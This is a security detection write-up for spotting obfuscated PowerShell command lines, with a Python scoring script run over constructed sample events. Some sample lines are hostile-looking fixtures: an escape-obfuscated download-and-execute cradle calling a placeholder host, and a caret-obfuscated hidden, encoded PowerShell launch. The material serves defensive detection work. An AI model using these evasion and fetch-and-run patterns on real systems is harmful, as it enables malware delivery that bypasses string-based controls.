Malicious PowerShell Process With Obfuscation Techniques

Description

This search looks for PowerShell processes launched with arguments that have characters indicative of obfuscation on the command-line.



Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume

Medium

Journey

Stage 3

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

PowerShell
Scripting

Kill Chain Phases

Command and Control
Actions On Objectives

Data Sources

Endpoint Detection and Response

Malicious PowerShell Process With Obfuscation Techniques Help

This search looks for PowerShell processes whose command-line arguments contain unusual escape characters: the backtick (`), which is PowerShell's own escape character, and the caret (^), which is the escape character of cmd.exe and therefore shows up when PowerShell is launched through a cmd.exe one-liner. Inserting these characters into a command (for example, Inv`oke-Ex`pression, or p^o^w^e^r^s^h^e^l^l) does not change what eventually executes, because the interpreter drops the escape character before it interprets the token, but it defeats controls that look for literal malicious strings and cmdlet names. The search counts the occurrences of these obfuscation characters in each command line and lists the destination IPs of the endpoints running these PowerShell commands. Expect some benign noise: a single backtick is common in legitimate scripts that use escape sequences such as `n and `t, so the count, not the mere presence, of these characters is what matters.
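The search itself is a Splunk SPL query that is not reproduced on this page. The following is an added, stand-alone Python re-implementation of the same idea, written for this page and not the page's or Splunk's own code, run over a handful of constructed process-creation events (host, image, command line). It normalizes the command line first so that a caret-obfuscated cmd.exe launch of PowerShell is still recognized as a PowerShell execution, then scores the raw command line by counting backticks and carets, ignoring backticks that start a documented PowerShell escape sequence. The event format, the example.invalid URL, the escape-letter list and the alert threshold of 3 are assumptions for the example, not values taken from the original search.

```python
import re
from collections import defaultdict

# Documented PowerShell backtick escape sequences (`0 `a `b `e `f `n `r `t `u `v).
# A backtick in front of any other character is a no-op and therefore a sign of
# obfuscation. (Assumed list for this example; `e and `u are PowerShell 6+.)
ESCAPE_LETTERS = "0abefnrtuv"

# Assumed alert threshold: flag a command line once it carries at least this many
# obfuscation characters. Tune to your environment.
THRESHOLD = 3

# Constructed sample events: (dest host, process image, command line).
# The obfuscated lines are made up for illustration; the base64 blob decodes to "IEX".
SAMPLE_EVENTS = [
    ("ws01", "powershell.exe",
     'powershell.exe -Command "Get-Process | Where-Object {$_.CPU -gt 100}"'),
    ("ws01", "powershell.exe",
     'powershell.exe -Command "Write-Host Done`n"'),          # legitimate `n escape
    ("ws02", "powershell.exe",
     'powershell.exe -nop -w hidden -c "Inv`oke-Ex`pres`sion (Ne`w-Ob`ject '
     "Net.Web`Cl`ient).Down`loadString('http://example.invalid/a')\""),
    ("ws03", "cmd.exe",
     "cmd.exe /c p^o^w^e^r^s^h^e^l^l -nop -w hidden -enc SQBFAFgA"),
    ("ws04", "notepad.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]


def normalize(cmdline: str) -> str:
    """Undo escape-character obfuscation so the real tokens can be matched.

    cmd.exe removes a caret and keeps the character after it (^^ becomes ^);
    PowerShell does the same with a backtick unless it starts a documented
    escape sequence, which is preserved here so `n stays `n.
    """
    s = re.sub(r"\^(.)", r"\1", cmdline)
    s = re.sub(r"`(?![" + ESCAPE_LETTERS + r"])(.)", r"\1", s)
    return s


def obfuscation_score(cmdline: str) -> int:
    """Count backticks and carets used as obfuscation in the raw command line."""
    backticks = cmdline.count("`")
    legit = len(re.findall(r"`[" + ESCAPE_LETTERS + "]", cmdline))
    return (backticks - legit) + cmdline.count("^")


def is_powershell(process: str, normalized_cmdline: str) -> bool:
    """Match on the image name or on the de-obfuscated command line, so that
    cmd.exe /c p^o^w^e^r^s^h^e^l^l is still treated as a PowerShell launch."""
    return "powershell" in process.lower() or "powershell" in normalized_cmdline.lower()


def find_obfuscated(events, threshold: int = THRESHOLD):
    """Return the events whose obfuscation score reaches the threshold."""
    hits = []
    for host, process, cmdline in events:
        norm = normalize(cmdline)
        if not is_powershell(process, norm):
            continue
        score = obfuscation_score(cmdline)
        if score >= threshold:
            hits.append({"dest": host, "process": process,
                         "score": score, "normalized": norm})
    return hits


def hosts_by_score(hits):
    """Aggregate per destination host, the way the search lists affected endpoints."""
    per_host = defaultdict(int)
    for hit in hits:
        per_host[hit["dest"]] += hit["score"]
    return dict(per_host)


if __name__ == "__main__":
    found = find_obfuscated(SAMPLE_EVENTS)
    for hit in found:
        print(f"{hit['dest']}: score={hit['score']} process={hit['process']}")
        print(f"    de-obfuscated: {hit['normalized']}")
    print("per host:", hosts_by_score(found))
```

Scoring the raw line while matching on the normalized one is the point of the example: the cmd.exe event never contains the literal string "powershell", and the ws01 event with a genuine `n escape scores zero, so neither the caret trick nor ordinary escape sequences throw the detection off.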